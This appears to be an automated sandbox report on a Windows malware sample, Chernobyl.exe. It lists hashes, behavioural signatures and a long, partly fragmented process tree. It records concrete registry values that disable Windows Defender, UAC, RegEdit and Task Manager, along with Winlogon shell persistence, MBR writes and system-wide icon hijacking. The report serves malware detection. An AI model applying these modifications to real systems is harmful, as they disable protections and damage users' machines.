Analysis
- max time kernel: 110s
- max time network: 18s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 03-03-2024 02:01

Static task: static1

General
- Target: Chernobyl.exe
- Size: 418KB
- MD5: f5007f18070e9cfc0b23c5ebb25c4468
- SHA1: cf430806009fe87580705a85474a8604c84292fe
- SHA256: 18f27d42b09fe462af83c3ec3e82842e09a7db2e9c69cb6044e977b7af87a3c9
- SHA512: 7b9de630ea04314813895e2dc8908429bc393f2a7c0dd50ed1ac7802f8ba3d36998886bd9da3dd7c857a992dd9aecf016eb55a0cb33a3b234fa1e3137f094c50
- SSDEEP: 6144:kibkUpo02222222222222222222222222222222222222222222222222222222u:ytH0NOZzv4TatsNqaJx

Malware Config

Signatures
Contains code to disable Windows Defender (4 IoCs)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes (resource / yara_rule):
- behavioral1/memory/1244-0-0x000000013F620000-0x000000013F68C000-memory.dmp (disable_win_def)
- behavioral1/memory/1244-2-0x000000001BB00000-0x000000001BB80000-memory.dmp (disable_win_def)
- behavioral1/memory/1244-4-0x000000001BB00000-0x000000001BB80000-memory.dmp (disable_win_def)
- \Users\Admin\AppData\Local\Temp\Chernobyl.exe (disable_win_def)
Modifies WinLogon for persistence (2 TTPs, 1 IoCs)
Processes (description / ioc / process):
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" (Chernobyl.exe)
UAC bypass
Processes (description / ioc / process):
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (Chernobyl.exe)
Disables RegEdit via registry modification (1 IoCs)
Processes (description / ioc / process):
- Set value (int) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (Chernobyl.exe)
Disables Task Manager via registry modification
Possible privilege escalation attempt (64 IoCs)
Processes: takeown.exe, icacls.exe
Loads dropped DLL (5 IoCs)
Processes: PID 1208 (5 events)
Modifies file permissions (1 TTPs, 64 IoCs)
Processes: takeown.exe, icacls.exe
Modifies system executable filetype association (2 TTPs, 3 IoCs)
Processes (description / ioc / process):
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon (Chernobyl.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" (Chernobyl.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" (Chernobyl.exe)
Checks whether UAC is enabled
Processes (description / ioc / process):
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (Chernobyl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (Chernobyl.exe)
Modifies WinLogon (2 TTPs, 2 IoCs)
Processes (description / ioc / process):
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" (Chernobyl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" (Chernobyl.exe)
Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes (description / ioc / process):
- File opened for modification \??\PhysicalDrive0 (Chernobyl.exe)
Drops file in System32 directory (2 IoCs)
Processes (description / ioc / process):
- File opened for modification C:\Windows\System32\kill.ico (Chernobyl.exe)
- File opened for modification C:\Windows\System32\wallpaper.jpg (Chernobyl.exe)
Drops file in Windows directory (2 IoCs)
Processes (description / ioc / process):
- File created C:\Windows\cluttscape.exe (Chernobyl.exe)
- File opened for modification C:\Windows\cluttscape.exe (Chernobyl.exe)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Modifies File Icons (3 IoCs)
Processes (description / ioc / process):
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons (Chernobyl.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" (Chernobyl.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" (Chernobyl.exe)
Modifies registry class (39 IoCs)
Processes (description / ioc / process; all by Chernobyl.exe):
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}
- Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon
- Key created \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: Chernobyl.exe, PID 1244 (64 events)
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes: Chernobyl.exe, PID 1244
Suspicious use of AdjustPrivilegeToken (48 IoCs)
Processes (description / pid / process):
- Token: SeDebugPrivilege, PID 1244 Chernobyl.exe (2 events)
- Token: SeTakeOwnershipPrivilege, takeown.exe (46 events, one per takeown.exe instance)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description / pid / process / target process; each pair is logged three times unless noted):
- PID 1244 (Chernobyl.exe) wrote to memory of 2192 (cmd.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 1696 (cmd.exe)
- PID 1696 (cmd.exe) wrote to memory of 668 (conhost.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 476 (cmd.exe)
- PID 2192 (cmd.exe) wrote to memory of 436 (rundll32.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 1520 (cmd.exe)
- PID 476 (cmd.exe) wrote to memory of 880 (rundll32.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 1584 (cmd.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 1980 (cmd.exe)
- PID 1520 (cmd.exe) wrote to memory of 1644 (rundll32.exe)
- PID 1584 (cmd.exe) wrote to memory of 1688 (rundll32.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 1552 (rundll32.exe)
- PID 1980 (cmd.exe) wrote to memory of 624 (rundll32.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 2828 (cmd.exe)
- PID 1552 (cmd.exe) wrote to memory of 2680 (rundll32.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 2840 (cmd.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 1104 (cmd.exe)
- PID 2828 (cmd.exe) wrote to memory of 2952 (conhost.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 2216 (cmd.exe)
- PID 2840 (cmd.exe) wrote to memory of 2824 (rundll32.exe)
- PID 1104 (cmd.exe) wrote to memory of 1536 (rundll32.exe)
- PID 1244 (Chernobyl.exe) wrote to memory of 2200 (conhost.exe) (1 event)
System policy modification (1 TTPs, 3 IoCs)
Processes (description / ioc / process):
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" (Chernobyl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (Chernobyl.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" (Chernobyl.exe)
Processes
- Level 1: C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe, command line "C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe", PID 1244
  - Modifies WinLogon for persistence
  - UAC bypass
  - Disables RegEdit via registry modification
  - Modifies system executable filetype association
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Writes to the Master Boot Record (MBR)
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies File Icons
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification

Every level-2 child below is C:\Windows\System32\cmd.exe with command line "C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit, and each one spawns a level-3 C:\Windows\system32\rundll32.exe with command line RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters. The pairs, as parent cmd.exe PID -> child rundll32.exe PID (level-2 entries flagged "Suspicious use of WriteProcessMemory" are marked WPM):
- cmd.exe PID 2192 (WPM) -> rundll32.exe PID 436
- cmd.exe PID 1696 (WPM) -> rundll32.exe PID 668
- cmd.exe PID 476 (WPM) -> rundll32.exe PID 880
- cmd.exe PID 1520 (WPM) -> rundll32.exe PID 1644
- cmd.exe PID 1584 (WPM) -> rundll32.exe PID 1688
- cmd.exe PID 1980 (WPM) -> rundll32.exe PID 624
- cmd.exe PID 1552 (WPM) -> rundll32.exe PID 2680
- cmd.exe PID 2828 (WPM) -> rundll32.exe PID 2952
- cmd.exe PID 2840 (WPM) -> rundll32.exe PID 2824
- cmd.exe PID 1104 (WPM) -> rundll32.exe PID 1536
- cmd.exe PID 2216 -> rundll32.exe PID 912
- cmd.exe PID 2200 -> rundll32.exe PID 2752
- cmd.exe PID 2096 -> rundll32.exe PID 1072
- cmd.exe PID 2764 -> rundll32.exe PID 1268
- cmd.exe PID 2212 -> rundll32.exe PID 1544
- cmd.exe PID 1548 -> rundll32.exe PID 1624
- cmd.exe PID 1676 -> rundll32.exe PID 904
- cmd.exe PID 764 -> rundll32.exe PID 1744
- cmd.exe PID 2188 -> rundll32.exe PID 1216
- cmd.exe PID 2080 -> rundll32.exe PID 576
- cmd.exe PID 1220 -> rundll32.exe PID 1092
- cmd.exe PID 2084 -> rundll32.exe PID 2132
- cmd.exe PID 1528 -> rundll32.exe PID 1612
- cmd.exe PID 2896 -> rundll32.exe PID 1488
- cmd.exe PID 1620 -> rundll32.exe PID 1576
- cmd.exe PID 2320 -> rundll32.exe PID 1128
- cmd.exe PID 1100 -> rundll32.exe PID 716
- cmd.exe PID 1724 -> rundll32.exe PID 2600
- cmd.exe PID 2908 -> rundll32.exe PID 728
- cmd.exe PID 1180 -> rundll32.exe PID 1312
- cmd.exe PID 732 -> rundll32.exe PID 2356
- cmd.exe PID 2100 -> rundll32.exe PID 2668
- cmd.exe PID 2556 -> rundll32.exe PID 2512
- cmd.exe PID 2652 -> rundll32.exe PID 2380
- cmd.exe PID 2460 -> rundll32.exe PID 2468
- cmd.exe PID 2360 -> rundll32.exe PID 2860
- cmd.exe PID 2852 -> rundll32.exe PID 2328
- cmd.exe PID 2144 -> rundll32.exe PID 2324
- cmd.exe PID 760 -> rundll32.exe PID 2728
- cmd.exe PID 1108 -> rundll32.exe PID 436
- cmd.exe PID 540 -> rundll32.exe PID 632
- cmd.exe PID 1988 -> rundll32.exe PID 1360
- cmd.exe PID 1712 -> rundll32.exe PID 1660
- cmd.exe PID 2636 -> rundll32.exe PID 2816
- cmd.exe PID 2408 -> rundll32.exe PID 1080
- cmd.exe PID 2696 -> rundll32.exe PID 1940
- cmd.exe PID 2684 -> rundll32.exe PID 1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3056
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2208
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2772
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:820
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1808
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:956
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2128
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2988
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:888
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2260
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1612
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2304
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1220
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2212
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2560
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:856
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1148
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2492
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:716
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:728
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2776
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2548
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2660
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2468
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2848
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2856
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:320
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2012
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:996
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1120
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1588
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2388
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2712
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1844
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1788
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:904
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1864
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1920
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2992
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1532
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2100
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:956
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2652
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1612
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1756
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1972
-
-
-
